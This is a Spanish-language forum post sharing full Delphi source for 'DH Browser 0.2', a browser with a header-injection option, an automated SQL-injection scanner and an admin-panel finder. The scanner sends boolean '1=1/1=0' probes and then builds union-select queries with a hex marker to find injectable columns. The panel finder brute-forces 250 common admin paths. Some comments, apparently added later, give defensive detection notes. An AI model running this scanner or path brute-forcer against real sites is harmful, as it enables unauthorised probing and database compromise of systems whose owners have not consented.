[Delphi] DH Browser 0.2

Iniciado por BigBear, 15 Noviembre 2013, 15:02 PM


BigBear

Un simple browser que hice en Delphi con las siguientes opciones:

  • Podés ver el código HTML de la página cargada
  • Se pueden buscar palabras en el código HTML
  • Se pueden modificar los headers para HTTP header injection
  • Trae un SQLI Scanner para buscar vulnerabilidades SQLI
  • Trae un PanelFinder para buscar el panel del admin

    Unas imágenes:





    El código:

    Carga


    // DH Browser 0.2
    // (C) Doddy Hackman 2013

    unit dhbrowse;

    interface

    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, StdCtrls, acPNG, ExtCtrls, ComCtrls, acProgressBar, sGroupBox,
      sSkinManager;

    type
      // Loader ("Carga") form. Its timer handler fills the progress bar, hides
      // this form and then shows Form2 (unit programa).
      // The component fields below are streamed from the .dfm resource, so their
      // names and types must stay in sync with the form file.
      TForm1 = class(TForm)
        sGroupBox1: TsGroupBox;
        sProgressBar1: TsProgressBar; // progress indicator driven by Timer1Timer
        Timer1: TTimer; // fires Timer1Timer
        Image1: TImage;

        sSkinManager1: TsSkinManager; // configured in FormCreate
        procedure Button1Click(Sender: TObject); // shows Form2
        procedure Timer1Timer(Sender: TObject); // progress countdown, then switches to Form2
        procedure FormCreate(Sender: TObject); // selects and activates the skin
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      // Global instance referenced by the handlers (Form1.Update, Form1.Hide).
      Form1: TForm1;

    implementation

    uses programa;
    {$R *.dfm}

    procedure TForm1.Button1Click(Sender: TObject);
    // Click handler: brings up the browser form (Form2, from unit programa).
    begin
      Form2.Show();
    end;

    procedure TForm1.FormCreate(Sender: TObject);
    // Configures the skin manager when the form is created: the skin directory is
    // the "Data" folder next to the executable, the skin is 'tv-b', and skinning
    // is then switched on.
    // NOTE(review): skin files are read from a path derived from the executable's
    // location; presumably that folder should not be writable by other users,
    // since whatever is placed there gets loaded at start-up. Confirm.
    var
      skinFolder: string;
    begin
      skinFolder := ExtractFilePath(Application.ExeName) + 'Data';
      sSkinManager1.SkinDirectory := skinFolder;
      sSkinManager1.SkinName := 'tv-b';
      sSkinManager1.Active := True;
    end;

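    procedure TForm1.Timer1Timer(Sender: TObject);
    // Splash countdown: advances the progress bar in ten steps of 10 (one step
    // per second), then hides this form and shows the browser form (Form2).
    //
    // Changes from the original:
    //  - the timer is disabled on entry, so the handler cannot fire again while
    //    it is still blocking in Sleep;
    //  - the loop runs exactly the ten steps that were ever executed (the old
    //    "1 to 100" bound was never reached);
    //  - the handler returns normally instead of calling Abort, which raised a
    //    silent EAbort exception purely to leave the loop.
    const
      StepCount = 10;
      StepSize = 10;
      StepDelayMs = 1000;
    var
      step: Integer;
    begin
      Timer1.Enabled := False;

      sProgressBar1.Min := 0;
      sProgressBar1.Max := StepCount * StepSize;

      for step := 1 to StepCount do
      begin
        // Repaint before blocking, so the bar is visibly updated.
        Form1.Update;
        Sleep(StepDelayMs);
        sProgressBar1.Position := step * StepSize;
      end;

      Form1.Hide;
      Form2.Show;
    end;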

    end.

    // The End ?


    Navegador


    // DH Browser 0.2
    // (C) Doddy Hackman 2013
    // Credits :
    // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
    // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
    // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm

    unit programa;

    interface

    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo,
      sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG,
      ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent,
      IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar;

    type
      // Main browser form. The component fields are streamed from the .dfm
      // resource, so their names and types must stay in sync with the form file.
      TForm2 = class(TForm)
        sSkinManager1: TsSkinManager; // configured in FormCreate
        sGroupBox1: TsGroupBox;
        sEdit1: TsEdit; // URL field; read by Navigate, the SQLI scan and the panel finder
        sButton1: TsButton; // navigate (sButton1Click)
        sGroupBox2: TsGroupBox;
        sMemo1: TsMemo; // text passed as additional request headers when sCheckBox1 is checked
        sCheckBox1: TsCheckBox; // enables sending the sMemo1 headers
        sGroupBox3: TsGroupBox;
        sStatusBar1: TsStatusBar; // panel 0 shows scan progress messages
        WebBrowser1: TWebBrowser; // embedded browser control
        sGroupBox4: TsGroupBox;
        sButton2: TsButton; // SQLI scan (sButton2Click)
        sButton3: TsButton; // admin-panel finder (sButton3Click)
        sGroupBox5: TsGroupBox;
        sButton4: TsButton; // opens the find dialog (sButton4Click)
        sLabel1: TsLabel;
        Image1: TImage;
        sMemo2: TsMemo; // HTML source of the loaded page (filled in WebBrowser1DownloadComplete)
        PopupMenu1: TPopupMenu;
        S1: TMenuItem; // show source view (S1Click)
        S2: TMenuItem; // show rendered view (S2Click)
        IdHTTP1: TIdHTTP; // HTTP client used by the SQLI scan
        PerlRegEx1: TPerlRegEx; // regex matcher used by the SQLI scan
        FindDialog1: TFindDialog; // text search inside sMemo2
        sProgressBar1: TsProgressBar; // page-load progress
        procedure sButton1Click(Sender: TObject);
        procedure S1Click(Sender: TObject);
        procedure S2Click(Sender: TObject);
        procedure sButton3Click(Sender: TObject);
        procedure sButton2Click(Sender: TObject);
        procedure sButton4Click(Sender: TObject);
        procedure FindDialog1Find(Sender: TObject);
        procedure FormClose(Sender: TObject; var Action: TCloseAction);
        procedure WebBrowser1ProgressChange(ASender: TObject;
          Progress, ProgressMax: Integer);
        procedure WebBrowser1DownloadComplete(Sender: TObject);
        procedure FormCreate(Sender: TObject);
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      // Global instance; unit dhbrowse shows it via Form2.Show.
      Form2: TForm2;

    implementation

    {$R *.dfm}

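    procedure TForm2.FindDialog1Find(Sender: TObject);

    // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
    //
    // Searches the HTML source memo (sMemo2) for the dialog's FindText, starting
    // just after the current selection, and selects the next occurrence if there
    // is one. Focus is returned to the memo in either case.
    //
    // Changes from the original:
    //  - the two GetMem buffers were never freed (a leak on every "Find Next");
    //    managed strings are used instead, so nothing has to be released;
    //  - the buffers were sized in bytes (Length + 1) while StrPCopy/GetTextBuf
    //    write characters, which overruns the heap block wherever Char is wider
    //    than one byte;
    //  - the memo length was stored in a Word, so text longer than 65535
    //    characters was truncated before searching.

    var
      haystack: string;
      needle: string;
      base: PChar;
      hit: PChar;
      offset: Integer;

    begin
      needle := (Sender as TFindDialog).FindText;
      haystack := sMemo2.Text;

      // Resume after the current selection, never past the terminating #0.
      offset := sMemo2.SelStart + sMemo2.SelLength;
      if offset > Length(haystack) then
        offset := Length(haystack);

      base := PChar(haystack);
      hit := StrPos(base + offset, PChar(needle));

      if hit <> nil then
      begin
        // Pointer difference is the character index of the match in the memo.
        sMemo2.SelStart := hit - base;
        sMemo2.SelLength := Length(needle);
      end;

      sMemo2.SetFocus;
    end;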

    procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
    // Closing the browser form ends the whole application. Form2 is shown from
    // the loader form in unit dhbrowse, which hides itself beforehand.
    begin
      Application.Terminate();
    end;

    procedure TForm2.FormCreate(Sender: TObject);
    // Configures the skin manager when the form is created: skins are looked up
    // in the "Data" folder next to the executable, 'tv-b' is selected, and
    // skinning is then activated.
    var
      skinFolder: string;
    begin
      skinFolder := ExtractFilePath(Application.ExeName) + 'Data';
      sSkinManager1.SkinDirectory := skinFolder;
      sSkinManager1.SkinName := 'tv-b';
      sSkinManager1.Active := True;
    end;

    procedure TForm2.S1Click(Sender: TObject);
    // Menu item S1: switch to the source view (hide the browser control, show
    // the HTML memo).
    const
      ShowSource = True;
    begin
      WebBrowser1.Visible := not ShowSource;
      sMemo2.Visible := ShowSource;
    end;

    procedure TForm2.S2Click(Sender: TObject);
    // Menu item S2: switch to the rendered view (show the browser control, hide
    // the HTML memo).
    const
      ShowSource = False;
    begin
      WebBrowser1.Visible := not ShowSource;
      sMemo2.Visible := ShowSource;
    end;

    procedure TForm2.sButton1Click(Sender: TObject);

    // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
    //
    // Loads the URL typed into sEdit1 in the embedded browser, bypassing the
    // cache for both reading and writing. When sCheckBox1 is ticked, the text of
    // sMemo1 is passed unmodified as the additional-headers argument of
    // Navigate; otherwise an empty string is passed.
    //
    // Seen from the server side, this is a reminder that every request header is
    // client-controlled input: it has to be validated like any other parameter
    // and never trusted for access decisions.

    var
      navFlags: OLEVariant;
      frameName: OLEVariant;
      postData: OLEVariant;
      extraHeaders: OLEVariant;

    begin
      navFlags := navNoReadFromCache or navNoWriteToCache;
      frameName := '';
      postData := '';

      if sCheckBox1.Checked then
        extraHeaders := sMemo1.Text
      else
        extraHeaders := '';

      WebBrowser1.Navigate(sEdit1.Text, navFlags, frameName, postData,
        extraHeaders);
    end;

    procedure TForm2.sButton2Click(Sender: TObject);
    // "SQLI Scanner" button handler. All requests are GETs issued through
    // IdHTTP1 against the URL prefix taken from sEdit1.Text.
    //
    // Steps, as written below:
    //  1. Fetch the prefix with '1+and+1=1--' and with '1+and+1=0--' appended
    //     and compare the two response bodies as plain strings.
    //  2. Only if they differ, send up to 35 further requests (i = 2..36), each
    //     adding one more concat(0x4b30425241,<n>,0x4b30425241) item to a
    //     'union select' list, and look for 'K0BRA<n>K0BRA' in the response.
    //  3. On the first match, write a URL into sEdit1 and leave via Abort.
    //
    // Detection notes for defenders: 0x4b30425241 is the hex encoding of the
    // ASCII marker 'K0BRA'. The marker, '+union+select+' and the '+and+1=0'
    // probes are literal substrings of the request URL, so they show up
    // verbatim in web-server access logs and can be matched by WAF/IDS rules.
    // Parameterized queries on the server side remove the behavior this relies on.
    //
    // NOTE(review): IdHTTP1.Get is called without any exception handling here;
    // presumably a non-success HTTP status raises and ends the handler - confirm.
    var
      pass1: string; // '+', used in place of a space in the query string
      pass2: string; // '--', appended at the end of each probe
      code: string; // response body of the current request
      urltest: string; // probe suffix that grows by one concat(...) item per iteration
      urlgen: string; // plain column list '1,2,3,...' built in parallel with urltest
      full: string; // URL written back to sEdit1 on a match
      codedos: string; // response body of the '1=0' request
      i: Integer;

    begin

      sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...';
      Form2.sStatusBar1.Update;

      pass1 := '+';
      pass2 := '--';

      // NOTE(review): dead store - urltest is reassigned below before it is read.
      urltest := 'concat(0x4b30425241,1,0x4b30425241)';

      sStatusBar1.Panels[0].Text := '[+] Checking ...';
      Form2.sStatusBar1.Update;

      // Request pair that differs only in the boolean condition (1=1 vs 1=0).
      code := IdHTTP1.Get
        (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);

      codedos := IdHTTP1.Get
        (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2);

      // Exact string comparison of the two bodies decides whether to continue.
      if not(code = codedos) then
      begin

        sStatusBar1.Panels[0].Text := '[+] Finding columns number';
        Form2.sStatusBar1.Update;

        urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
          'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
        urlgen := '1';
        for i := 2 to 36 do
        begin
          sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
          Form2.sStatusBar1.Update;
          urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
            + ',0x4b30425241)';
          urlgen := urlgen + ',' + IntToStr(i);
          code := IdHTTP1.Get(sEdit1.Text + urltest + pass2);
          // The marker pair brackets whatever value the response carries.
          PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA';
          PerlRegEx1.Subject := code;

          if PerlRegEx1.Match then
          begin

            // The empty flag set means only the first occurrence of the captured
            // text in the column list is replaced with 'hackman'.
            urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1],
              'hackman', []);
            full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
              'union' + pass1 + 'select' + pass1 + urlgen;

            sEdit1.Text := full;
            // Abort raises the silent EAbort exception, so the '[+] Done' status
            // update at the end of the procedure is skipped on this path.
            Abort;

          end;
        end;
      end;

      sStatusBar1.Panels[0].Text := '[+] Done';
      Form2.sStatusBar1.Update;

    end;

    procedure TForm2.sButton3Click(Sender: TObject);
    // "PanelFinder" button handler. Walks the fixed wordlist below and issues
    // one GET per entry to sEdit1.Text + '/' + entry using a locally created
    // TIdHTTP. The first entry answered with status 200 is appended to the URL
    // in sEdit1 and the scan stops.
    //
    // Detection notes for defenders: a run produces up to 250 sequential GETs
    // from one client for admin/login-style paths (see the list). Such a burst
    // is easy to spot in access logs and is a natural target for rate limiting;
    // administrative interfaces should rely on authentication and network
    // restrictions rather than on an unguessable path.
    //
    // NOTE(review): the TIdHTTP instance created below is never freed in this
    // procedure, so each click leaks one object; a try..finally with Free
    // would fix it.
    // NOTE(review): both exception handlers are empty, so network and protocol
    // errors are discarded without any indication in the UI.
    const
      // Relative paths that are requested, in this order.
      paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
        'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
        'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
        'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
        'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
        'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
        'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
        'login/index.asp', 'login/index.aspx', 'login/login.asp',
        'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
        'administracion/index.asp', 'administracion/index.aspx',
        'administracion/login.asp', 'administracion/login.aspx',
        'administracion/webmaster.asp', 'administracion/webmaster.aspx',
        'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
        'admin/admin.php', 'admin/index.php', 'admin/login.php',
        'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
        'admin/default.php', 'administracion/', 'administracion/index.php',
        'administracion/login.php', 'administracion/ingresar.php',
        'administracion/admin.php', 'administration/', 'administration/index.php',
        'administration/login.php', 'administrator/index.php',
        'administrator/login.php', 'administrator/system.php', 'system/',
        'system/login.php', 'admin.php', 'login.php', 'administrador.php',
        'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
        'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
        'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
        'admin/index.html', 'admin/login.html', 'admin/home.php',
        'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
        'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
        'administrator/index.html', 'administrator/login.html',
        'administrator/account.html', 'administrator/account.php',
        'administrator.html', 'login.html', 'modelsearch/login.php',
        'moderator.php', 'moderator.html', 'moderator/login.php',
        'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
        'moderator/', 'account.php', 'account.html', 'controlpanel/',
        'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
        'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
        'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
        'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
        'administrator/index.asp', 'administrator/login.asp',
        'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
        'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
        'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
        'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
        'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
        'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
        'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
        'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
        'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
        'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
        'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
        'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
        'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
        'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
        'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
        'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
        'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
        'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
        'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
        'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
        'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
        'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
        'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
        'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
        'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
        'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
        'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
        'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
        'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
        'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
        'system_administration/', 'ss_vms_admin_sm/');
    var
      IdHTTP: TIdHTTP; // local HTTP client (separate from the form's IdHTTP1)
      i: Integer;
      control: Integer; // 0 while searching, 1 once a path returned 200
    begin

      control := 0;

      sStatusBar1.Panels[0].Text := '[+] Finding Panel ....';
      Form2.sStatusBar1.Update;

      // Created without an owner; see the NOTE(review) above about freeing it.
      IdHTTP := TIdHTTP.Create(nil);

      for i := Low(paginas) to High(paginas) do

        if (control = 1) then
        begin
          // A hit was recorded on the previous iteration: Abort raises the silent
          // EAbort exception, which ends the handler before another request is
          // sent. The trailing '[+] Done' update is skipped on this path, but the
          // same text was already set when the hit was found.
          Abort;
        end
        else
        begin

          try

            sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
            Form2.sStatusBar1.Update;

            IdHTTP.Get(sEdit1.Text + '/' + paginas[i]);
            // Only an exact 200 status counts as a hit.
            if IdHTTP.ResponseCode = 200 then
            begin

              sStatusBar1.Panels[0].Text := '[+] Done';
              Form2.sStatusBar1.Update;
              sEdit1.Text := sEdit1.Text + '/' + paginas[i];
              control := 1;
            end;
          except
            // Both handlers are intentionally empty: any failure just moves on
            // to the next path.
            on E: EIdHttpProtocolException do
              ;
            on E: Exception do
              ;
          end;

        end;

      sStatusBar1.Panels[0].Text := '[+] Done';
      Form2.sStatusBar1.Update;

    end;

    procedure TForm2.sButton4Click(Sender: TObject);
    // Opens the find dialog; each search request is then handled by
    // FindDialog1Find. The Boolean result of Execute is not needed here.
    begin
      FindDialog1.Execute();
    end;

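    procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);
    // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
    //
    // Resets the progress bar and refreshes the source view: sMemo2 is cleared,
    // then filled with the outerHTML of the document's root element, which is
    // found by walking up from <body> until there is no parent left.
    //
    // Changes from the original: a missing document or body is now checked for
    // explicitly instead of being left to fault inside a blanket "except".
    // The markup is only ever placed in a memo as plain text; it is not
    // rendered or executed by this handler.
    var
      doc: IHTMLDocument2;
      node: IHTMLElement;
      parent: IHTMLElement;
    begin

      sProgressBar1.Position := 0;

      try
        sMemo2.Clear;

        // The event can fire before a document exists, or for a non-HTML
        // document that does not implement IHTMLDocument2.
        if not Supports(WebBrowser1.Document, IHTMLDocument2, doc) then
          Exit;

        node := doc.body;
        if node = nil then
          Exit;

        // Climb to the root element so the whole page is captured.
        parent := node.parentElement;
        while parent <> nil do
        begin
          node := parent;
          parent := node.parentElement;
        end;

        sMemo2.Lines.Add(node.outerHTML);
      except
        // Best effort, as in the original: a failing COM call leaves the source
        // view empty rather than interrupting browsing.
        on E: Exception do
          ;
      end;
    end;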

    procedure TForm2.WebBrowser1ProgressChange(ASender: TObject;
      Progress, ProgressMax: Integer);
    // Mirrors the browser control's load progress on the progress bar. The
    // maximum is set first, then the position.
    var
      bar: TsProgressBar;
    begin
      bar := sProgressBar1;
      bar.Max := ProgressMax;
      bar.Position := Progress;
    end;

    end.

    // The End ?



    Si lo quieren bajar, lo pueden hacer de acá.